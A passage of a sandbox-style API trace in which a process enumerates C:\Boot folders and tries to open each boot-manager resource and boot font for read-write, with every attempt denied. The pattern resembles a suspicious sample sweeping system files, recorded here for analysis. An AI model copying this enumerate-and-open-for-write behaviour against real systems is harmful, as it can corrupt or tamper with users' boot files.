lpFindFileData=0x245f810*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0129.814] FindNextFileW (in: hFindFile=0x597fa0, lpFindFileData=0x245f810 | out: lpFindFileData=0x245f810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe836d95d, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c40, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0129.814] GetProcessHeap () returned 0x550000 [0129.814] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x22e) returned 0x594e90 [0129.814] CreateFileW (lpFileName="C:\\Boot\\fi-FI\\bootmgr.exe.mui" (normalized: "c:\\boot\\fi-fi\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0129.814] GetLastError () returned 0x5 [0129.814] FindNextFileW (in: hFindFile=0x597fa0, lpFindFileData=0x245f810 | out: lpFindFileData=0x245f810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe836d95d, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c40, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0129.815] FindClose (in: hFindFile=0x597fa0 | out: hFindFile=0x597fa0) returned 1 [0129.815] GetProcessHeap () returned 0x550000 [0129.815] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x594e90 | out: hHeap=0x550000) returned 1 [0129.815] FindNextFileW (in: hFindFile=0x56c9b0, lpFindFileData=0x245fa98 | out: lpFindFileData=0x245fa98*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac276640, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Fonts", cAlternateFileName="")) returned 1 [0129.815] GetProcessHeap () returned 0x550000 [0129.815] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x2c) returned 0x56cb70 [0129.815] FindFirstFileW (in: lpFileName="C:\\Boot\\Fonts\\*.*", lpFindFileData=0x245f810 | out: lpFindFileData=0x245f810*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac276640, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x597fa0 [0129.821] GetProcessHeap () returned 0x550000 [0129.821] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x56cb70 | out: hHeap=0x550000) returned 1 [0129.821] FindNextFileW (in: hFindFile=0x597fa0, lpFindFileData=0x245f810 | out: lpFindFileData=0x245f810*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac276640, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0129.821] FindNextFileW (in: hFindFile=0x597fa0, lpFindFileData=0x245f810 | out: lpFindFileData=0x245f810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x64c5ad69, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x385e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="chs_boot.ttf", cAlternateFileName="")) returned 1 [0129.821] GetProcessHeap () returned 0x550000 [0129.821] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x22e) returned 0x594e90 [0129.821] CreateFileW (lpFileName="C:\\Boot\\Fonts\\chs_boot.ttf" (normalized: "c:\\boot\\fonts\\chs_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0129.821] GetLastError () returned 0x5 [0129.821] FindNextFileW (in: hFindFile=0x597fa0, lpFindFileData=0x245f810 | out: lpFindFileData=0x245f810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac191e00, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac191e00, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x6505f253, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x3b27a4, dwReserved0=0x0, dwReserved1=0x0, cFileName="cht_boot.ttf", cAlternateFileName="")) returned 1 [0129.822] CreateFileW (lpFileName="C:\\Boot\\Fonts\\cht_boot.ttf" (normalized: "c:\\boot\\fonts\\cht_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0129.831] GetLastError () returned 0x5 [0129.831] FindNextFileW (in: hFindFile=0x597fa0, lpFindFileData=0x245f810 | out: lpFindFileData=0x245f810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac204220, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac204220, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x65274577, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x1e46e4, dwReserved0=0x0, dwReserved1=0x0, cFileName="jpn_boot.ttf", cAlternateFileName="")) returned 1 [0129.831] CreateFileW (lpFileName="C:\\Boot\\Fonts\\jpn_boot.ttf" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0129.831] GetLastError () returned 0x5 [0129.831] FindNextFileW (in: hFindFile=0x597fa0, lpFindFileData=0x245f810 | out: lpFindFileData=0x245f810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac22a380, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac22a380, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x6530caef, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x242f20, dwReserved0=0x0, dwReserved1=0x0, cFileName="kor_boot.ttf", cAlternateFileName="")) returned 1 [0129.831] CreateFileW (lpFileName="C:\\Boot\\Fonts\\kor_boot.ttf" (normalized: "c:\\boot\\fonts\\kor_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0129.831] GetLastError () returned 0x5 [0129.831] FindNextFileW (in: hFindFile=0x597fa0, lpFindFileData=0x245f810 | out: lpFindFileData=0x245f810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac276640, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x65332c4d, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xb95c, dwReserved0=0x0, dwReserved1=0x0, cFileName="wgl4_boot.ttf", cAlternateFileName="WGL4_B~1.TTF")) returned 1 [0129.831] CreateFileW (lpFileName="C:\\Boot\\Fonts\\wgl4_boot.ttf" (normalized: "c:\\boot\\fonts\\wgl4_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0129.832] GetLastError () returned 0x5 [0129.832] FindNextFileW (in: hFindFile=0x597fa0, lpFindFileData=0x245f810 | out: lpFindFileData=0x245f810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac276640, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x65332c4d, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xb95c, dwReserved0=0x0, dwReserved1=0x0, cFileName="wgl4_boot.ttf", cAlternateFileName="WGL4_B~1.TTF")) returned 0 [0129.832] FindClose (in: hFindFile=0x597fa0 | out: hFindFile=0x597fa0) returned 1 [0129.832] GetProcessHeap () returned 0x550000 [0129.832] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x594e90 | out: hHeap=0x550000) returned 1 [0129.832] FindNextFileW (in: hFindFile=0x56c9b0, lpFindFileData=0x245fa98 | out: lpFindFileData=0x245fa98*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="fr-FR", cAlternateFileName="")) returned 1 [0129.832] GetProcessHeap () returned 0x550000 [0129.832] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x2c) returned 0x56cb70 [0129.832] FindFirstFileW (in: lpFileName="C:\\Boot\\fr-FR\\*.*", lpFindFileData=0x245f810 | out: lpFindFileData=0x245f810*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x597fa0 [0129.862] GetProcessHeap () returned 0x550000 [0129.862] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x56cb70 | out: hHeap=0x550000) returned 1 [0129.862] FindNextFileW (in: hFindFile=0x597fa0, lpFindFileData=0x245f810 | out: lpFindFileData=0x245f810*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0129.863] FindNextFileW (in: hFindFile=0x597fa0, lpFindFileData=0x245f810 | out: lpFindFileData=0x245f810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe86b3703, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16c40, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0129.863] GetProcessHeap () returned 0x550000 [0129.863] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x22e) returned 0x594e90 [0129.863] CreateFileW (lpFileName="C:\\Boot\\fr-FR\\bootmgr.exe.mui" (normalized: "c:\\boot\\fr-fr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0129.863] GetLastError () returned 0x5 [0129.863] FindNextFileW (in: hFindFile=0x597fa0, lpFindFileData=0x245f810 | out: lpFindFileData=0x245f810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe86b3703, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16c40, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0129.863] FindClose (in: hFindFile=0x597fa0 | out: hFindFile=0x597fa0) returned 1 [0129.863] GetProcessHeap () returned 0x550000 [0129.863] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x594e90 | out: hHeap=0x550000) returned 1 [0129.863] FindNextFileW (in: hFindFile=0x56c9b0, lpFindFileData=0x245fa98 | out: lpFindFileData=0x245fa98*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="hu-HU", cAlternateFileName="")) returned 1 [0129.863] GetProcessHeap () returned 0x550000 [0129.863] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x2c) returned 0x56cb70 [0129.863] FindFirstFileW (in: lpFileName="C:\\Boot\\hu-HU\\*.*", lpFindFileData=0x245f810 | out: lpFindFileData=0x245f810*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x597fa0 [0129.864] GetProcessHeap () returned 0x550000 [0129.864] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x56cb70 | out: hHeap=0x550000) returned 1 [0129.864] FindNextFileW (in: hFindFile=0x597fa0, lpFindFileData=0x245f810 | out: lpFindFileData=0x245f810*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0129.864] FindNextFileW (in: hFindFile=0x597fa0, lpFindFileData=0x245f810 | out: lpFindFileData=0x245f810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe817e7d8, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16240, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0129.864] GetProcessHeap () returned 0x550000 [0129.864] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x22e) returned 0x594e90 [0129.864] CreateFileW (lpFileName="C:\\Boot\\hu-HU\\bootmgr.exe.mui" (normalized: "c:\\boot\\hu-hu\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0129.864] GetLastError () returned 0x5 [0129.864] FindNextFileW (in: hFindFile=0x597fa0, lpFindFileData=0x245f810 | out: lpFindFileData=0x245f810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe817e7d8, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16240, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0129.864] FindClose (in: hFindFile=0x597fa0 | out: hFindFile=0x597fa0) returned 1 [0129.864] GetProcessHeap () returned 0x550000 [0129.865] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x594e90 | out: hHeap=0x550000) returned 1 [0129.865] FindNextFileW (in: hFindFile=0x56c9b0, lpFindFileData=0x245fa98 | out: lpFindFileData=0x245fa98*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="it-IT", cAlternateFileName="")) returned 1 [0129.865] GetProcessHeap () returned 0x550000 [0129.865] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x2c) returned 0x56cb70 [0129.865] FindFirstFileW (in: lpFileName="C:\\Boot\\it-IT\\*.*", lpFindFileData=0x245f810 | out: lpFindFileData=0x245f810*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x597fa0 [0129.878] GetProcessHeap () returned 0x550000 [0129.878] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x56cb70 | out: hHeap=0x550000) returned 1 [0129.878] FindNextFileW (in: hFindFile=0x597fa0, lpFindFileData=0x245f810 | out: lpFindFileData=0x245f810*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0129.878] FindNextFileW (in: hFindFile=0x597fa0, lpFindFileData=0x245f810 | out: lpFindFileData=0x245f810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e80ea3, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0129.878] GetProcessHeap () returned 0x550000 [0129.878] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x22e) returned 0x594e90 [0129.879] CreateFileW (lpFileName="C:\\Boot\\it-IT\\bootmgr.exe.mui" (normalized: "c:\\boot\\it-it\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0129.879] GetLastError () returned 0x5 [0129.879] FindNextFileW (in: hFindFile=0x597fa0, lpFindFileData=0x245f810 | out: lpFindFileData=0x245f810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e80ea3, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0129.879] FindClose (in: hFindFile=0x597fa0 | out: hFindFile=0x597fa0) returned 1 [0129.879] GetProcessHeap () returned 0x550000 [0129.879] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x594e90 | out: hHeap=0x550000) returned 1 [0129.879] FindNextFileW (in: hFindFile=0x56c9b0, lpFindFileData=0x245fa98 | out: lpFindFileData=0x245fa98*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="ja-JP", cAlternateFileName="")) returned 1 [0129.879] GetProcessHeap () returned 0x550000 [0129.879] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x2c) returned 0x56cb70 [0129.879] FindFirstFileW (in: lpFileName="C:\\Boot\\ja-JP\\*.*", lpFindFileData=0x245f810 | out: lpFindFileData=0x245f810*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x597fa0 [0129.880] GetProcessHeap () returned 0x550000 [0129.880] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x56cb70 | out: hHeap=0x550000) returned 1 [0129.880] FindNextFileW (in: hFindFile=0x597fa0, lpFindFileData=0x245f810 | out: lpFindFileData=0x245f810*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0129.880] FindNextFileW (in: hFindFile=0x597fa0, lpFindFileData=0x245f810 | out: lpFindFileData=0x245f810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12a40, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0129.880] GetProcessHeap () returned 0x550000 [0129.880] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x22e) returned 0x594e90 [0129.880] CreateFileW (lpFileName="C:\\Boot\\ja-JP\\bootmgr.exe.mui" (normalized: "c:\\boot\\ja-jp\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0129.880] GetLastError () returned 0x5 [0129.880] FindNextFileW (in: hFindFile=0x597fa0, lpFindFileData=0x245f810 | out: lpFindFileData=0x245f810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12a40, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0129.881] FindClose (in: hFindFile=0x597fa0 | out: hFindFile=0x597fa0) returned 1 [0129.881] GetProcessHeap () returned 0x550000 [0129.881] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x594e90 | out: hHeap=0x550000) returned 1 [0129.881] FindNextFileW (in: hFindFile=0x56c9b0, lpFindFileData=0x245fa98 | out: lpFindFileData=0x245fa98*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="ko-KR", cAlternateFileName="")) returned 1 [0129.881] GetProcessHeap () returned 0x550000 [0129.881] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x2c) returned 0x56cb70 [0129.881] FindFirstFileW (in: lpFileName="C:\\Boot\\ko-KR\\*.*", lpFindFileData=0x245f810 | out: lpFindFileData=0x245f810*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x597fa0 [0129.883] GetProcessHeap () returned 0x550000 [0129.883] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x56cb70 | out: hHeap=0x550000) returned 1 [0129.883] FindNextFileW (in: hFindFile=0x597fa0, lpFindFileData=0x245f810 | out: lpFindFileData=0x245f810*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, 